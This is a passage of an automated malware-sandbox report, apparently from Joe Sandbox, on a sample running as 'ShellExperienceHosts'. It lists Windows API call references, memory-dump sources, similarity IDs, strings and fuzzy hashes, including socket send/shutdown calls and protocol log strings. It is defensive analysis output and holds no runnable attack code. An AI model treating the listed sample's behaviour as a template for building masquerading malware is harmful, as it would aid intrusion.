                                                                            • GetCurrentThreadId.KERNEL32 ref: 02233F3C
                                                                            • SetLastError.KERNEL32(0000139F,?,10015054,0223361F), ref: 0223402B
                                                                              • Part of subcall function 02232B57: SwitchToThread.KERNEL32 ref: 02232B81
                                                                            • send.WS2_32(?,10017440,00000010,00000000), ref: 02233F9D
                                                                            • SetEvent.KERNEL32(?), ref: 02233FC0
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02233FCC
                                                                            • WSACloseEvent.WS2_32(?), ref: 02233FDA
                                                                            • shutdown.WS2_32(?,00000001), ref: 02233FF2
                                                                            • closesocket.WS2_32(?), ref: 02233FFC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLastSwitchclosesocketsendshutdown
                                                                            • String ID:
                                                                            • API String ID: 518013673-0
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 10003F65
                                                                            • SetLastError.KERNEL32(0000139F,?,74DEDFA0,10003648), ref: 10004054
                                                                              • Part of subcall function 10002B80: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 10002B96
                                                                              • Part of subcall function 10002B80: SwitchToThread.KERNEL32 ref: 10002BAA
                                                                            • send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
                                                                            • SetEvent.KERNEL32(?), ref: 10003FE9
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
                                                                            • WSACloseEvent.WS2_32(?), ref: 10004003
                                                                            • shutdown.WS2_32(?,00000001), ref: 1000401B
                                                                            • closesocket.WS2_32(?), ref: 10004025
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                            • String ID:
                                                                            • API String ID: 3254528666-0
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004074
                                                                            • ResetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004087
                                                                            • ResetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004090
                                                                            • ResetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004099
                                                                              • Part of subcall function 10001350: HeapFree.KERNEL32(?,00000000,?,?,?,100040A6,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10001390
                                                                              • Part of subcall function 10001420: HeapFree.KERNEL32(?,00000000,?,?,?,100040B1,?,00000000,10004039,?,74DEDFA0,10003648), ref: 1000143D
                                                                              • Part of subcall function 10001420: _free.LIBCMT ref: 10001459
                                                                            • HeapDestroy.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 100040B9
                                                                            • HeapCreate.KERNEL32(?,?,?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 100040D4
                                                                            • SetEvent.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004150
                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,10004039,?,74DEDFA0,10003648), ref: 10004157
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                            • String ID:
                                                                            • API String ID: 1219087420-0
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(00000020), ref: 6C7A893A
                                                                            • GetSystemMetrics.USER32(00000021), ref: 6C7A8944
                                                                            • GetSystemMetrics.USER32(00000005), ref: 6C7A8953
                                                                            • GetSystemMetrics.USER32(00000006), ref: 6C7A895D
                                                                            • GetSystemMetrics.USER32(0000005C), ref: 6C7A8974
                                                                            • GetSystemMetrics.USER32(0000005C), ref: 6C7A897E
                                                                            • GetSystemMetrics.USER32(00000007), ref: 6C7A8996
                                                                            • GetSystemMetrics.USER32(00000008), ref: 6C7A89A0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 4116985748-0
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C6F6506
                                                                            • GetWindow.USER32(?,00000005), ref: 6C6F6575
                                                                              • Part of subcall function 6C6F6F6C: __EH_prolog3.LIBCMT ref: 6C6F6F73
                                                                              • Part of subcall function 6C6F6F6C: GetWindow.USER32(?,00000005), ref: 6C6F6F91
                                                                              • Part of subcall function 6C6F6F6C: GetWindow.USER32(?,00000002), ref: 6C6F6FCA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$H_prolog3
                                                                            • String ID:
                                                                            • API String ID: 1351209170-0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543398477.00000000031A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_31a0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$_malloc
                                                                            • String ID: ($6$gfff$gfff
                                                                            • API String ID: 3506388080-713438465
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C6EAF20
                                                                            • InflateRect.USER32(?,00000002,00000000), ref: 6C6EB11C
                                                                              • Part of subcall function 6C7B0BCD: SetRectEmpty.USER32(?), ref: 6C7B0BE6
                                                                            • IsRectEmpty.USER32(?), ref: 6C6EB1B7
                                                                              • Part of subcall function 6C73913E: GetParent.USER32(?), ref: 6C73916A
                                                                              • Part of subcall function 6C6E2DA8: ScreenToClient.USER32(?,?), ref: 6C6E2DB7
                                                                              • Part of subcall function 6C6E2DA8: ScreenToClient.USER32(?,?), ref: 6C6E2DC4
                                                                            • GetWindowRect.USER32(?,?), ref: 6C6EB1F0
                                                                            • UnionRect.USER32(?,?,?), ref: 6C6EB214
                                                                            • EqualRect.USER32(?,?), ref: 6C6EB222
                                                                            • OffsetRect.USER32(?,?,?), ref: 6C6EB23F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$ClientEmptyScreen$EqualH_prolog3_InflateOffsetParentUnionWindow
                                                                            • String ID:
                                                                            • API String ID: 1622821726-0
                                                                            APIs
                                                                              • Part of subcall function 10001610: __vswprintf.LIBCMT ref: 10001646
                                                                            • _malloc.LIBCMT ref: 10002330
                                                                              • Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
                                                                              • Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
                                                                              • Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap__vswprintf_malloc
                                                                            • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                            • API String ID: 3723585974-868042568
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C6FC47B
                                                                            • InflateRect.USER32(?,?,00000000), ref: 6C6FC50F
                                                                            • InflateRect.USER32(?,000000F6,00000000), ref: 6C6FC524
                                                                            • InflateRect.USER32(?,00000000,000000FD), ref: 6C6FC5F4
                                                                            • InflateRect.USER32(?,?,?), ref: 6C6FC609
                                                                            • GetTextColor.GDI32(?), ref: 6C6FC674
                                                                            • Polygon.GDI32(00000000,?,00000003), ref: 6C6FC6C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: InflateRect$ColorH_prolog3_PolygonText
                                                                            • String ID:
                                                                            • API String ID: 2032528157-0
                                                                            • Opcode ID: 6d12fc8fe6e0ab3f10bc137a7005dabe9a3d24b53910986cb3c70e9fe5a528b2
                                                                            • Instruction ID: b3843f58323c9fd7c15593f9111a760586e4c1f77d486c0e2775fbd427ab11e9
                                                                            • Opcode Fuzzy Hash: 6d12fc8fe6e0ab3f10bc137a7005dabe9a3d24b53910986cb3c70e9fe5a528b2
                                                                            • Instruction Fuzzy Hash: C9A16071E01119EFCF15DFA8C8449EDBBB6FF49314F14422AF926AB284CB719906CB94
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C70AFCF
                                                                              • Part of subcall function 6C770D49: GetParent.USER32(?), ref: 6C770D57
                                                                              • Part of subcall function 6C770D49: GetParent.USER32(?), ref: 6C770D6A
                                                                              • Part of subcall function 6C770D49: GetParent.USER32(?), ref: 6C770D84
                                                                              • Part of subcall function 6C770D49: SetFocus.USER32(?,00000000,?,6C6B1C04,?), ref: 6C770D9D
                                                                            • GetClientRect.USER32(?,?), ref: 6C70AFF3
                                                                            • SetCapture.USER32(?), ref: 6C70B022
                                                                              • Part of subcall function 6C70CAD9: IsRectEmpty.USER32(?), ref: 6C70CB00
                                                                              • Part of subcall function 6C70CAD9: InvertRect.USER32(?,?), ref: 6C70CB0E
                                                                              • Part of subcall function 6C70CAD9: SetRectEmpty.USER32(?), ref: 6C70CB1E
                                                                            • SetCapture.USER32(?), ref: 6C70B075
                                                                            • PtInRect.USER32(00000040,?,?), ref: 6C70B159
                                                                            • GetCapture.USER32 ref: 6C70B183
                                                                            • ReleaseCapture.USER32 ref: 6C70B18D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$Capture$Parent$Empty$ClientFocusH_prolog3_InvertRelease
                                                                            • String ID:
                                                                            • API String ID: 636197404-0
                                                                            • Opcode ID: 0b7dd039a70cf7bbe463cd56a19704efdba7b72c1295ae958513cd0da24c8a6e
                                                                            • Instruction ID: 8083ad3b2786dd4f7231e583959ef9870dd1f40ea4d575df589e83170d71371b
                                                                            • Opcode Fuzzy Hash: 0b7dd039a70cf7bbe463cd56a19704efdba7b72c1295ae958513cd0da24c8a6e
                                                                            • Instruction Fuzzy Hash: 59816BB1B01219DFCF15DFB4CA88AAD7BB5BF49308F104169E826AB750CB31EA05CB54
                                                                            APIs
                                                                            • _free.LIBCMT ref: 10001878
                                                                            • _free.LIBCMT ref: 100018B6
                                                                            • _free.LIBCMT ref: 100018F5
                                                                            • _free.LIBCMT ref: 10001935
                                                                            • _free.LIBCMT ref: 1000195D
                                                                            • _free.LIBCMT ref: 10001981
                                                                            • _free.LIBCMT ref: 100019B9
                                                                              • Part of subcall function 10006E49: HeapFree.KERNEL32(00000000,00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006E5F
                                                                              • Part of subcall function 10006E49: GetLastError.KERNEL32(00000000,?,10009900,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000), ref: 10006E71
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
                                                                            • Instruction ID: a8bd5bf31f2101c09de15a5e31c6c05fc03f2a154fed00425f0cdbd26510a762
                                                                            • Opcode Fuzzy Hash: 6beac5a88b0ea45cad91d564d56e12dc9c07d13e28084cda825bb388b8fc93ec
                                                                            • Instruction Fuzzy Hash: 9C511C76A00211CFE704DF58C5D4899BBE6FF89294726C0ADD5096B326CB32BD42CB91
                                                                            APIs
                                                                              • Part of subcall function 6C76E63F: __EH_prolog3_catch.LIBCMT ref: 6C76E646
                                                                            • UpdateWindow.USER32(?), ref: 6C71C8E5
                                                                            • EqualRect.USER32(?,?), ref: 6C71C925
                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 6C71C93D
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C71C94C
                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 6C71C963
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 6C71C975
                                                                            • UpdateWindow.USER32(?), ref: 6C71C97E
                                                                              • Part of subcall function 6C71B09D: InvalidateRect.USER32(?,?,00000001,?), ref: 6C71B114
                                                                              • Part of subcall function 6C71B09D: InflateRect.USER32(?,00000000,?), ref: 6C71B15A
                                                                              • Part of subcall function 6C71B09D: RedrawWindow.USER32(?,?,00000000,00000401), ref: 6C71B16E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Rect$InflateInvalidateWindow$Update$EqualH_prolog3_catchRedraw
                                                                            • String ID:
                                                                            • API String ID: 1041772997-0
                                                                            • Opcode ID: b8a2dac41ff3f54d550f7d3fb414c52a592ef9523841b51202dcc49adbf0b6d8
                                                                            • Instruction ID: ee4877188ce04eb29008a35a056651a72439c31dcf3a79ef476a8ed533c006b8
                                                                            • Opcode Fuzzy Hash: b8a2dac41ff3f54d550f7d3fb414c52a592ef9523841b51202dcc49adbf0b6d8
                                                                            • Instruction Fuzzy Hash: 195184756002069FCF04DF64C988BAE3BB5BF49319F140279EC1AEB695DB719D01CBA0
                                                                            APIs
                                                                              • Part of subcall function 6C7A89B1: IsWindow.USER32(00000000), ref: 6C7A89D0
                                                                            • IsWindowVisible.USER32(00000000), ref: 6C74CF9B
                                                                            • IsWindowVisible.USER32(00000000), ref: 6C74CFB6
                                                                            • IsWindowVisible.USER32(00000000), ref: 6C74D016
                                                                            • IsWindowVisible.USER32(00000000), ref: 6C74D04C
                                                                            • IsWindowVisible.USER32(00000000), ref: 6C74D05F
                                                                            • IsZoomed.USER32(00000000), ref: 6C74D08C
                                                                            • GetSystemMetrics.USER32(00000004), ref: 6C74D0FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Visible$MetricsSystemZoomed
                                                                            • String ID:
                                                                            • API String ID: 890500415-0
                                                                            • Opcode ID: c91236f97e45efccf148aa66cae194a7de5f491db4c9c19c65134d05e6ead1fa
                                                                            • Instruction ID: 3a31a874f9723ced8471cd479eff8d1498f60e27ae6d903412c3b7b81ced17ae
                                                                            • Opcode Fuzzy Hash: c91236f97e45efccf148aa66cae194a7de5f491db4c9c19c65134d05e6ead1fa
                                                                            • Instruction Fuzzy Hash: 6151A030B00206DFDB01DF65CA48BA9B7F5BF1834AF148179D865D7A61DB70E842CB95
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 6C724A1F
                                                                              • Part of subcall function 6C6E2C90: __EH_prolog3.LIBCMT ref: 6C6E2C97
                                                                              • Part of subcall function 6C6E2C90: GetWindowDC.USER32(00000000,00000004,6C7413FB,00000000), ref: 6C6E2CC3
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 6C724A58
                                                                            • CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6C724AE1
                                                                            • CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 6C724AFB
                                                                              • Part of subcall function 6C6E2A7E: SelectObject.GDI32(?,!+nl), ref: 6C6E2A87
                                                                            • FillRect.USER32(?,00000000,-00000098), ref: 6C724B46
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Create$Compatible$BitmapFillH_prolog3H_prolog3_ObjectRectSectionSelectWindow
                                                                            • String ID: (
                                                                            • API String ID: 2680359821-3887548279
                                                                            • Opcode ID: 4e056af99c48f571620a0f30cf3b6edd3378584b380e260d54d5d2595cd9948d
                                                                            • Instruction ID: cc88e79229783d8c5947fec4c6d58a78a6bed9af3893060117f92daf7266955d
                                                                            • Opcode Fuzzy Hash: 4e056af99c48f571620a0f30cf3b6edd3378584b380e260d54d5d2595cd9948d
                                                                            • Instruction Fuzzy Hash: EB511771D052189BDB14CFE4CA49BEEBBB5FF08304F10412EE415AB690DB74A909DF54
                                                                            APIs
                                                                            • _ValidateLocalCookies.LIBCMT ref: 6C84CDE7
                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6C84CDEF
                                                                            • _ValidateLocalCookies.LIBCMT ref: 6C84CE78
                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6C84CEA3
                                                                            • _ValidateLocalCookies.LIBCMT ref: 6C84CEF8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                            • String ID: csm
                                                                            • API String ID: 1170836740-1018135373
                                                                            • Opcode ID: 70931ccd263e7c95ff5e6ad29549dca2e18a4359c1b164add79c2d6b2ad64505
                                                                            • Instruction ID: 07c5f38a9d8c3d4719c96317254abb25c5f4d5e81f9f253cb9188602a845ba1f
                                                                            • Opcode Fuzzy Hash: 70931ccd263e7c95ff5e6ad29549dca2e18a4359c1b164add79c2d6b2ad64505
                                                                            • Instruction Fuzzy Hash: 4041C974A0121DABCF20DF69C940A9EBBB5AF46318F24C975E8145BB52D731DE09CBD0
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 6C74AFF8
                                                                            • IsWindow.USER32(?), ref: 6C74B2A5
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 6C74B2E2
                                                                            • OffsetRect.USER32(?,?,?), ref: 6C74B2F2
                                                                            • CopyRect.USER32(?,?), ref: 6C74B308
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: RectWindow$CopyInfoOffsetParametersSystem
                                                                            • String ID: ,
                                                                            • API String ID: 1377071818-3772416878
                                                                            • Opcode ID: 286cc5ef0a36bda5a9af3944d983be7eb21e6062f72e49b1627db44664fd75c0
                                                                            • Instruction ID: 766ea1a2f1ceb81c4e48fa71cbc72dfc74fa0d12a762d4cbb4cc970216028b56
                                                                            • Opcode Fuzzy Hash: 286cc5ef0a36bda5a9af3944d983be7eb21e6062f72e49b1627db44664fd75c0
                                                                            • Instruction Fuzzy Hash: CA315D71B00609ABDF18DBA9DA48FAEB7B9FF88219F10417AE515D7650DB30ED04CB90
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(10015EB4,?,022375B9,10017B60,00000008,0223774D,?,?,?,10017B80,0000000C,02237808,?), ref: 02239AA5
                                                                            • __mtterm.LIBCMT ref: 02239AB1
                                                                              • Part of subcall function 0223977C: RtlDecodePointer.NTDLL(100191C8), ref: 0223978D
                                                                              • Part of subcall function 0223977C: TlsFree.KERNEL32(100191CC,0223767C,02237662,10017B60,00000008,0223774D,?,?,?,10017B80,0000000C,02237808,?), ref: 022397A7
                                                                            • TlsAlloc.KERNEL32(?,?,022375B9,10017B60,00000008,0223774D,?,?,?,10017B80,0000000C,02237808,?), ref: 02239B3E
                                                                            • __init_pointers.LIBCMT ref: 02239B63
                                                                            • __calloc_crt.LIBCMT ref: 02239BD1
                                                                            • GetCurrentThreadId.KERNEL32 ref: 02239BFD
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocCurrentDecodeFreeHandleModulePointerThread__calloc_crt__init_pointers__mtterm
                                                                            • String ID:
                                                                            • API String ID: 3766280069-0
                                                                            • Opcode ID: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                            • Instruction ID: c095cb93813fd9da96a4b804a9b3931815fcf7b2f715d25b5c02600d5d8fd52a
                                                                            • Opcode Fuzzy Hash: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
